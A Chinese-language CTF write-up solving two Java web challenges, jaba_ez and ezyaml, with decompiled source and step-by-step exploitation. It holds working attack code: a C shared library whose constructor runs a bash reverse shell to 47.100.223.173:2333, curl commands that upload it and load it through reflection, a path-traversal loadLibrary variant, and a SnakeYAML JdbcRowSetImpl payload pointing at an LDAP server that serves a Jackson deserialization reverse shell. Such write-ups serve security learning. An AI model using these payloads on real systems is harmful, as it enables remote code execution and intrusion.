WEB

这次主要就是记录一下两道java题的解法，都给了附件。

jaba_ez

Ez jaba

——————————

给了附件，java8，springboot2，在依赖中看到fastjson依赖：

1
2
3
4
5


<dependency>
            <groupId>com.alibaba</groupId>
            <artifactId>fastjson</artifactId>
            <version>1.2.83</version>
        </dependency>

一些存在的jar包：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29


- "BOOT-INF/lib/spring-boot-2.6.13.jar"
- "BOOT-INF/lib/spring-boot-autoconfigure-2.6.13.jar"
- "BOOT-INF/lib/logback-classic-1.2.11.jar"
- "BOOT-INF/lib/logback-core-1.2.11.jar"
- "BOOT-INF/lib/log4j-to-slf4j-2.17.2.jar"
- "BOOT-INF/lib/log4j-api-2.17.2.jar"
- "BOOT-INF/lib/jul-to-slf4j-1.7.36.jar"
- "BOOT-INF/lib/jakarta.annotation-api-1.3.5.jar"
- "BOOT-INF/lib/snakeyaml-1.29.jar"
- "BOOT-INF/lib/jackson-databind-2.13.4.2.jar"
- "BOOT-INF/lib/jackson-annotations-2.13.4.jar"
- "BOOT-INF/lib/jackson-core-2.13.4.jar"
- "BOOT-INF/lib/jackson-datatype-jdk8-2.13.4.jar"
- "BOOT-INF/lib/jackson-datatype-jsr310-2.13.4.jar"
- "BOOT-INF/lib/jackson-module-parameter-names-2.13.4.jar"
- "BOOT-INF/lib/tomcat-embed-core-9.0.68.jar"
- "BOOT-INF/lib/tomcat-embed-el-9.0.68.jar"
- "BOOT-INF/lib/tomcat-embed-websocket-9.0.68.jar"
- "BOOT-INF/lib/spring-web-5.3.23.jar"
- "BOOT-INF/lib/spring-beans-5.3.23.jar"
- "BOOT-INF/lib/spring-webmvc-5.3.23.jar"
- "BOOT-INF/lib/spring-aop-5.3.23.jar"
- "BOOT-INF/lib/spring-context-5.3.23.jar"
- "BOOT-INF/lib/spring-expression-5.3.23.jar"
- "BOOT-INF/lib/slf4j-api-1.7.36.jar"
- "BOOT-INF/lib/spring-core-5.3.23.jar"
- "BOOT-INF/lib/spring-jcl-5.3.23.jar"
- "BOOT-INF/lib/fastjson-1.2.83.jar"
- "BOOT-INF/lib/spring-boot-jarmode-layertools-2.6.13.jar"

现在来分析路由：

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264


package com.jabaez;

import ch.qos.logback.classic.pattern.CallerDataConverter;
import java.io.File;
import java.lang.reflect.Method;
import java.lang.reflect.Modifier;
import java.nio.charset.Charset;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import org.springframework.beans.factory.xml.BeanDefinitionParserDelegate;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;
import org.springframework.web.multipart.MultipartFile;
import org.springframework.web.servlet.tags.BindTag;

@RequestMapping({"/api"})
@RestController
/* loaded from: jaba-ez.jar:BOOT-INF/classes/com/jabaez/VulnController.class */
public class VulnController {
    private static Map<String, ScheduledJob> jobs = new HashMap();
    private static final String[] JOB_BLACKLIST = {"java.net.URL", "javax.naming.InitialContext", "org.yaml.snakeyaml", "org.springframework", "org.apache", "rmi", "ldap", "ldaps", "http", "https"};
    private static final String[] JOB_WHITELIST = {"com.jabaez.FLAG"};

    @GetMapping({"/server"})
    public Map<String, Object> getServerInfo() {
        Map<String, Object> info = new HashMap<>();
        info.put("javaHome", System.getProperty("java.home"));
        info.put("javaVersion", System.getProperty("java.version"));
        info.put("osName", System.getProperty("os.name"));
        info.put("userDir", System.getProperty("user.dir"));
        info.put("uploadDir", "/tmp/uploads");
        Charset gbk = Charset.forName("GBK");
        byte[] bytes = gbk.encode("你好").array();
        System.out.println(Arrays.toString(bytes));
        return info;
    }

    @PostMapping({"/upload"})
    public Map<String, String> uploadFile(@RequestParam("file") MultipartFile file) {
        String originalFilename;
        Map<String, String> result = new HashMap<>();
        try {
            File dir = new File("/tmp/uploads/");
            if (!dir.exists()) {
                dir.mkdirs();
            }
            originalFilename = file.getOriginalFilename();
        } catch (Exception e) {
            result.put(BindTag.STATUS_VARIABLE_NAME, "error");
            result.put("message", e.getMessage());
        }
        if (originalFilename == null) {
            result.put(BindTag.STATUS_VARIABLE_NAME, "error");
            result.put("message", "文件名为空");
            return result;
        }
        String filename = new File(originalFilename).getName();
        if (filename.contains(CallerDataConverter.DEFAULT_RANGE_DELIMITER) || filename.contains("/") || filename.contains("\\") || filename.startsWith(".")) {
            result.put(BindTag.STATUS_VARIABLE_NAME, "error");
            result.put("message", "非法文件名");
            return result;
        }
        File dest = new File("/tmp/uploads/" + filename);
        String uploadPathCanonical = new File("/tmp/uploads/").getCanonicalPath();
        String destCanonical = dest.getCanonicalPath();
        if (!destCanonical.startsWith(uploadPathCanonical + File.separator)) {
            result.put(BindTag.STATUS_VARIABLE_NAME, "error");
            result.put("message", "非法文件路径");
            return result;
        }
        file.transferTo(dest);
        result.put(BindTag.STATUS_VARIABLE_NAME, "success");
        result.put("path", dest.getAbsolutePath());
        result.put("message", "文件上传成功");
        return result;
    }

    @PostMapping({"/job/add"})
    public Map<String, Object> addJob(@RequestBody ScheduledJob job) {
        Map<String, Object> result = new HashMap<>();
        if (containsBlacklist(job.getInvokeTarget())) {
            result.put(BindTag.STATUS_VARIABLE_NAME, "error");
            result.put("message", "包含非法字符");
            return result;
        }
        if (!containsWhitelist(job.getInvokeTarget())) {
            result.put(BindTag.STATUS_VARIABLE_NAME, "error");
            result.put("message", "目标不在白名单中");
            return result;
        }
        jobs.put(job.getJobName(), job);
        result.put(BindTag.STATUS_VARIABLE_NAME, "success");
        result.put("message", "任务添加成功");
        result.put("jobId", job.getJobName());
        return result;
    }

    @PostMapping({"/job/run/{jobName}"})
    public Map<String, Object> runJob(@PathVariable String jobName) {
        Map<String, Object> result = new HashMap<>();
        ScheduledJob job = jobs.get(jobName);
        if (job == null) {
            result.put(BindTag.STATUS_VARIABLE_NAME, "error");
            result.put("message", "任务不存在");
            return result;
        }
        try {
            invokeMethod(job.getInvokeTarget());
            result.put(BindTag.STATUS_VARIABLE_NAME, "success");
            result.put("message", "任务执行成功");
        } catch (Exception e) {
            result.put(BindTag.STATUS_VARIABLE_NAME, "error");
            result.put("message", e.getMessage());
            result.put("stackTrace", e.getStackTrace()[0].toString());
        }
        return result;
    }

    private boolean containsBlacklist(String str) {
        if (str == null) {
            return false;
        }
        String lowerStr = str.toLowerCase();
        for (String blackItem : JOB_BLACKLIST) {
            if (lowerStr.contains(blackItem.toLowerCase())) {
                return true;
            }
        }
        return false;
    }

    private boolean containsWhitelist(String str) {
        if (str == null) {
            return false;
        }
        for (String whiteItem : JOB_WHITELIST) {
            if (str.contains(whiteItem)) {
                return true;
            }
        }
        return false;
    }

    private Object invokeMethod(String invokeTarget) throws Exception {
        int hashIndex = invokeTarget.indexOf(35);
        if (hashIndex == -1) {
            throw new IllegalArgumentException("Invalid format, expected: className#methodName(params)");
        }
        String className = invokeTarget.substring(0, hashIndex);
        String methodAndParams = invokeTarget.substring(hashIndex + 1);
        int paramStart = methodAndParams.indexOf(40);
        int paramEnd = methodAndParams.lastIndexOf(41);
        if (paramStart == -1 || paramEnd == -1) {
            throw new IllegalArgumentException("Invalid method format");
        }
        String methodName = methodAndParams.substring(0, paramStart);
        String paramStr = methodAndParams.substring(paramStart + 1, paramEnd);
        Class<?> clazz = Class.forName(className);
        List<Object> paramValues = new ArrayList<>();
        List<Class<?>> paramTypes = new ArrayList<>();
        if (!paramStr.trim().isEmpty()) {
            String[] params = splitParams(paramStr);
            for (String str : params) {
                String param = str.trim();
                if (param.startsWith("'") && param.endsWith("'")) {
                    String value = param.substring(1, param.length() - 1);
                    paramValues.add(value);
                    paramTypes.add(String.class);
                } else if (param.equals(BeanDefinitionParserDelegate.NULL_ELEMENT)) {
                    paramValues.add(null);
                    paramTypes.add(String.class);
                } else if (param.matches("\\d+")) {
                    paramValues.add(Integer.valueOf(Integer.parseInt(param)));
                    paramTypes.add(Integer.TYPE);
                } else if (param.equals("true") || param.equals("false")) {
                    paramValues.add(Boolean.valueOf(Boolean.parseBoolean(param)));
                    paramTypes.add(Boolean.TYPE);
                } else {
                    paramValues.add(param);
                    paramTypes.add(String.class);
                }
            }
        }
        try {
            Method method = clazz.getMethod(methodName, (Class[]) paramTypes.toArray(new Class[0]));
            if (Modifier.isStatic(method.getModifiers())) {
                return method.invoke(null, paramValues.toArray());
            }
            Object instance = clazz.newInstance();
            return method.invoke(instance, paramValues.toArray());
        } catch (NoSuchMethodException e) {
            Method method2 = clazz.getDeclaredMethod(methodName, (Class[]) paramTypes.toArray(new Class[0]));
            method2.setAccessible(true);
            if (Modifier.isStatic(method2.getModifiers())) {
                return method2.invoke(null, paramValues.toArray());
            }
            Object instance2 = clazz.newInstance();
            return method2.invoke(instance2, paramValues.toArray());
        }
    }

    private String[] splitParams(String paramStr) {
        List<String> params = new ArrayList<>();
        int bracketLevel = 0;
        int start = 0;
        for (int i = 0; i < paramStr.length(); i++) {
            char c = paramStr.charAt(i);
            if (c == '(' || c == '{' || c == '[') {
                bracketLevel++;
            } else if (c == ')' || c == '}' || c == ']') {
                bracketLevel--;
            } else if (c == ',' && bracketLevel == 0) {
                params.add(paramStr.substring(start, i));
                start = i + 1;
            }
        }
        if (start < paramStr.length()) {
            params.add(paramStr.substring(start));
        }
        return (String[]) params.toArray(new String[0]);
    }

    /* loaded from: jaba-ez.jar:BOOT-INF/classes/com/jabaez/VulnController$ScheduledJob.class */
    static class ScheduledJob {
        private String jobName;
        private String invokeTarget;
        private String cronExpression;

        ScheduledJob() {
        }

        public String getJobName() {
            return this.jobName;
        }

        public void setJobName(String jobName) {
            this.jobName = jobName;
        }

        public String getInvokeTarget() {
            return this.invokeTarget;
        }

        public void setInvokeTarget(String invokeTarget) {
            this.invokeTarget = invokeTarget;
        }

        public String getCronExpression() {
            return this.cronExpression;
        }

        public void setCronExpression(String cronExpression) {
            this.cronExpression = cronExpression;
        }
    }
}

存在一个文件上传的路由，主要就是如下几个限制：

文件名不能包含..
文件名不能包含/
文件名不能包含\\
文件名不能以.开始

但是对其它就没有任何限制，并且可以上传任意文件。

其次比较关键的就是可以添加任务和运行任务，在运行任务的路由调用了非常关键的invokeMethod()方法，这个方法的逻辑其实就是一个完整的反射调用，我们只需要传入类似：

1

java.lang.ProcessBuilder#start(['bash','-c','id'])

这种格式的语句就可以进行方法的反射调用，前面必须是类，只能调用此类中的一个方法，代码逻辑实现了自动识别参数类型，然后自动调用getMethod()获取方法并invoke来执行它。

但是在add job时，有黑白名单：

1
2


private static final String[] JOB_BLACKLIST = {"java.net.URL", "javax.naming.InitialContext", "org.yaml.snakeyaml", "org.springframework", "org.apache", "rmi", "ldap", "ldaps", "http", "https"};
    private static final String[] JOB_WHITELIST = {"com.jabaez.FLAG"};

要求我们设置的invokeTarget必须有自定义实现的FLAG类的关键字，FLAG类如下：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21


package com.jabaez;

/* loaded from: jaba-ez.jar:BOOT-INF/classes/com/jabaez/FLAG.class */
public class FLAG {
    private String flag;

    public FLAG() {
    }

    public FLAG(String flag) {
        this.flag = flag;
    }

    public String getFlag() {
        return this.flag;
    }

    public void setFlag(String flag) {
        this.flag = flag;
    }
}

可以文件上传，并且可以执行java代码，这里可以打jni，上传一个包含白名单的文件名，然后再调用System.load()直接加载即可，直接开干：

先在linux上生成一个so文件：

先生成com.jabaez.FLAG.c文件，内容为：

1
2
3
4
5
6
7


#include <stdlib.h>
#include <stdio.h>
#include <string.h>
 
__attribute__ ((__constructor__)) void preload (void){
    system("bash -c 'bash -i >& /dev/tcp/47.100.223.173/2333 0>&1'");
}

然后编译成so文件：

1

gcc -shared -fPIC com.jabaez.FLAG.c -o com.jabaez.FLAG.so

打包好so文件，直接上题了。

然后上传文件即可：

1
2


curl -X POST "http://pss.idss-cn.com:23474/api/upload" \
  -F "file=@com.jabaez.FLAG.so"

增加任务（后端代码的接受类的格式要求）：

1
2
3
4
5
6
7


curl -X POST http://pss.idss-cn.com:23474/api/job/add \
-H "Content-Type: application/json" \
-d '{
  "jobName": "Job",
  "invokeTarget": "java.lang.System#load('/tmp/uploads/com.jabaez.FLAG.so')",
  "cronExpression": "0/5 * * * * ?"
}'

然后执行任务：

1

curl -X POST http://pss.idss-cn.com:23474/api/job/run/Job

需要注意这里的run路由要求post方法。

即可反弹shell拿到flag:

但是只能弹一次，然后后续就会因为被加载过而不会再次加载，过程就和jni的调试过程一样，再想打就只有重新上传另外命名的so文件或者重开环境。

当然还可以打

1
2
3
4
5
6
7


curl -X POST http://pss.idss-cn.com:23510/api/job/add \
-H "Content-Type: application/json" \
-d '{
  "jobName": "Job",
  "invokeTarget": "com.sun.glass.utils.NativeLibLoader#loadLibrary('../../../../../../../../../../../tmp/uploads/com.jabaez.FLAG')",
  "cronExpression": "0/5 * * * * ?"
}'

————————

ezyaml

请用一句话证明你精通 Java System.out.println(“Hello World”);

——————————

给了附件，java8，springboot2，有一个snakeyaml依赖：

1
2
3
4
5


<dependency>
            <groupId>org.yaml</groupId>
            <artifactId>snakeyaml</artifactId>
            <version>1.33</version>
        </dependency>

看jar包存在springboot默认就有的jackson:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28


- "BOOT-INF/lib/spring-boot-2.7.18.jar"
- "BOOT-INF/lib/spring-boot-autoconfigure-2.7.18.jar"
- "BOOT-INF/lib/logback-classic-1.2.12.jar"
- "BOOT-INF/lib/logback-core-1.2.12.jar"
- "BOOT-INF/lib/log4j-to-slf4j-2.17.2.jar"
- "BOOT-INF/lib/log4j-api-2.17.2.jar"
- "BOOT-INF/lib/jul-to-slf4j-1.7.36.jar"
- "BOOT-INF/lib/jakarta.annotation-api-1.3.5.jar"
- "BOOT-INF/lib/jackson-databind-2.13.5.jar"
- "BOOT-INF/lib/jackson-annotations-2.13.5.jar"
- "BOOT-INF/lib/jackson-core-2.13.5.jar"
- "BOOT-INF/lib/jackson-datatype-jdk8-2.13.5.jar"
- "BOOT-INF/lib/jackson-datatype-jsr310-2.13.5.jar"
- "BOOT-INF/lib/jackson-module-parameter-names-2.13.5.jar"
- "BOOT-INF/lib/tomcat-embed-core-9.0.83.jar"
- "BOOT-INF/lib/tomcat-embed-el-9.0.83.jar"
- "BOOT-INF/lib/tomcat-embed-websocket-9.0.83.jar"
- "BOOT-INF/lib/spring-web-5.3.31.jar"
- "BOOT-INF/lib/spring-beans-5.3.31.jar"
- "BOOT-INF/lib/spring-webmvc-5.3.31.jar"
- "BOOT-INF/lib/spring-aop-5.3.31.jar"
- "BOOT-INF/lib/spring-context-5.3.31.jar"
- "BOOT-INF/lib/spring-expression-5.3.31.jar"
- "BOOT-INF/lib/slf4j-api-1.7.36.jar"
- "BOOT-INF/lib/spring-core-5.3.31.jar"
- "BOOT-INF/lib/spring-jcl-5.3.31.jar"
- "BOOT-INF/lib/snakeyaml-1.33.jar"
- "BOOT-INF/lib/spring-boot-jarmode-layertools-2.7.18.jar"

再看路由，简单明了：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33


package com.example.ezyaml.controller;

import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;
import org.yaml.snakeyaml.Yaml;

@RestController
/* loaded from: ezyaml-1.0-SNAPSHOT.jar:BOOT-INF/classes/com/example/ezyaml/controller/IndexController.class */
public class IndexController {
    private static final String[] blacklist = {"ClassPath", "DataSource", "URLClassLoader", "ScriptEngine"};

    @RequestMapping({"/"})
    public String index() {
        return "Hello ezyaml, Post /yaml param:yamlContent";
    }

    @PostMapping({"/yaml"})
    public String yaml(@RequestParam String yamlContent) {
        Yaml yaml = new Yaml();
        try {
            for (String b : blacklist) {
                if (yamlContent.contains(b)) {
                    return "存在非法关键字";
                }
            }
            return yaml.loadAs(yamlContent, Object.class).toString();
        } catch (Exception e) {
            return e.getMessage();
        }
    }
}

yaml路由存在snakeyaml反序列化，有黑名单，一看到这个题以为是考的最近发的snakeyaml的rce：

《SnakeYaml 不出网 RCE 新链（JDK原生链）挖掘》

结果本地出了题目中没出，本地是jdk8u71，从远程环境的回显来看是没有com.sun.javafx.iio.ImageFrame类，那么就打常规的snakeyaml反序列化调用setter方法打jndi，打JdbcRowSetImpl就行，挺常见了的，就是它的setter回调用到类中的connect()方法，然后可以打Jndi：

需要两次setter，一次设置dataSource值，一次调用到connect()方法，但是尝试直接在获取类时打不了，尝试打高版本的jndi打法，可以尝试打用ldap反序列化数据达到反序列化攻击的效果，正好springboot中存在jackson，那么就反序列化打jackson，用jndimap工具来打：

启动监听：

反弹shell监听端口：

然后在题目中打入payload:

1

!!com.sun.rowset.JdbcRowSetImpl {dataSourceName: "ldap://47.100.223.173:1389/Deserialize/Jackson/ReverseShell/47.100.223.173/2333", autoCommit: true}

如下：

成功反弹shell拿到flag：

flag如下：

1

flag{yo9kfwKt6WDXup2TmSxeNO3QE7Igd5Js}

不懂为什么给个提示说题目不出网，但是我还很怪为什么ldap能接受到请求结果说不出网，可能是想考下面这个？

《从 SnakeYaml 看 ClassPathXmlApplicationContext 不出网利用》

后面要学snakeyaml差不多看这两篇文章就行了。

第十届上海市大学生网络安全大赛wp

两道java题的wp

WEB

jaba_ez

ezyaml